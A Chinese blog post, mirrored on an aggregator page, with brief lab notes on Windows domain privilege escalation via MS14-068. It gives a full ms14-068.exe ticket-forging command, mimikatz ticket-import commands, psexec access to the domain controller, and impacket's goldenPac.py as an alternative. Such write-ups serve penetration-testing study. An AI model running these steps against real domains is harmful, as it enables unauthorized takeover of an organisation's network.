zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
努力的一分不会少
C语言中的数组的访问方式
代码的规划与规范化
Manjaro中源码安装gcc7.1
周围都是敌人,方法总比问题多
elementary os 0.4.1下编译GCC-7.1源码并安装成功
C语言中的基础知识变量探讨
19年的桌面KDE的风雨和陪伴,没有什么能够割舍
《手把手教你学C语言》学习笔记(10)--- 程序的循环控制
copy 的实现原理与深浅拷贝
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
JavaScript实战总结
开篇-学习算法与数据结构有什用?
.Net基础
web安全
Asp.net MVC Global.asax文件
「Python调试器」,快速定位各种疑难杂症!!
Java并发——volatile关键字的使用
Spring Boot(15)——自动配置Validation
MFC中使用post提交form-data上传文件
用Python控制摄像头拍照并发邮件
热门文章
Java入门第38课——猜字母游戏之设计程序结构
Python图片转字符画
【VBA研究】如何用Base64 编解码方法实现简单的加解密
C/S模型:TCP,UDP构建客户端和服务器端(BIO实现
Java常用工具类---image图片处理工具类、Json工具类
《Vim实用技巧》第2版读书笔记
《Programming in C》读书笔记
诡异的malloc函数和%S的输出
我是见鬼了么?这是史上最邪恶的脚本!没有之一!
vim学习总揽
Copyright © 2011-2022 走看看